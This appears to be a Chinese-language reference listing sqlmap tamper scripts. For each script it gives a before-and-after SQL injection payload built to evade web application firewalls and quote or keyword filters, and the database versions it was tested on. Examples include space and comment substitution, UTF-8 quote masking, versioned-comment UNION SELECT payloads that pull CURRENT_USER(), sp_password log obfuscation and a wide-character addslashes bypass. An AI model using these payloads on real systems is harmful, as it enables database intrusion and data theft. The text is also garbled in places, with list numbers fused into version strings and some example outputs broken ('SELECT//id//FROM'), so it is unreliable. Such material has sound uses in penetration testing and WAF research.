示例:
1 AND 9227=9227 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 ``` 版本要求: * MySQL >= 5.1.13 Tested 针对此做过测试: * MySQL 5.1.41 #### space2mssqlblank.py 作用:空格替换为其它空符号 示例: ```sql SELECT id FROM users SELECT%08id%02FROM%0Fusers版本要求:
Microsoft SQL Server 在以下版本做过测试: Microsoft SQL Server 2000 Microsoft SQL Server 20054:space2mysqlblank.py
作用:空格替换其它空白符号
示例:
SELECT id FROM users SELECT%0Bid%0BFROM%A0users版本要求:
MySQL 在以下版本做过测试: MySQL 5.15:space2mssqlhash.py
作用:替换空格
示例:
'1 AND 9227=9227' '1%23%0AAND%23%0A9227=9227'版本要求:
MSSQL MySQL6:modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
示例:
'1 AND 2>1--' '1 /*!30874AND 2>1*/--'版本要求:
MySQL 在以下版本做过测试: MySQL 5.07:space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/**/’
示例:
SELECT id FROM users SELECT//id//FROM/**/users在以下版本做过测试:
Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.08:space2mysqldash.py
作用:用–%0A替换空格
注:之前有个mssql的 这个是mysql的
示例:
'1 AND 9227=9227' '1--%0AAND--%0A9227=9227'版本要求:
MySQL MSSQL9:space2plus.py
作用:用+替换空格
示例:
'SELECT id FROM users' 'SELECT+id+FROM+users'在以下版本做过测试:
All
10:bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like
示例:
'SELECT id FROM users where id = 1' 'SELECT%09id FROM users where id LIKE 1'在以下版本做过测试:
MySQL 5.1, SGOS11:space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
示例:
'SELECT id FROM users' 'SELECT%0Did%0DFROM%0Ausers'在以下版本做过测试:
All
12:sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
示例:
'1 AND 9227=9227-- ' '1 AND 9227=9227-- sp_password'版本要求: * MSSQL
针对过滤引号的:1:apostrophemask.py
作用:用utf8代替单引号
示例:
"1 AND '1'='1" '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'在以下版本做过测试:
all
2:apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
示例:
"1 AND '1'='1" '1 AND %00%271%00%27=%00%271'在以下版本做过测试:
MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0 针对过滤关键字的:1:halfversionedmorekeywords.py
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
示例:
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"版本要求:
MySQL < 5.1 在以下版本做过测试: MySQL 4.0.18, 5.0.222:ifnull2ifisnull.py
作用:绕过对IFNULL过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
示例:
'IFNULL(1, 2)' 'IF(ISNULL(1),2,1)'版本要求:
MySQL SQLite (possibly) SAP MaxDB (possibly) 在以下版本做过测试: MySQL 5.0 and 5.53:multiplespaces.py
作用:围绕SQL关键字添加多个空格
示例:
'1 UNION SELECT foobar' '1 UNION SELECT foobar'在以下版本做过测试:
All
4:halfversionedmorekeywords.py
作用:关键字前加注释
示例:
value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa版本要求:
MySQL < 5.1 在以下版本做过测试: MySQL 4.0.18, 5.0.225:unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
示例:
'-1 UNION ALL SELECT' '-1 UNION SELECT'版本要求: all
6:randomcomments.py
作用:用/**/分割sql关键字
‘INSERT’ ‘IN//S//ERT’7:unmagicquotes.py
作用:宽字符绕过 GPC addslashes
示例:
1’ AND 1=1 1%bf%27 AND 1=1–%20 8:randomcase.py作用:随机大小写
示例:
INSERT
InsERt
在以下版本做过测试:
1:equaltolike.py
作用:like 代替等号
示例:
SELECT * FROM users WHERE id=1 SELECT * FROM users WHERE id LIKE 12:greatest.py
作用:绕过过滤’>’ ,用GREATEST替换大于号。
示例:
'1 AND A > B' '1 AND GREATEST(A,B+1)=A'在以下版本做过测试:
MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.03:between.py
作用:用between替换大于号(>)
示例:
'1 AND A > B--' '1 AND A NOT BETWEEN 0 AND B--'在以下版本做过测试:
Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0 其他类型:1:versionedmorekeywords.py
作用:注释绕过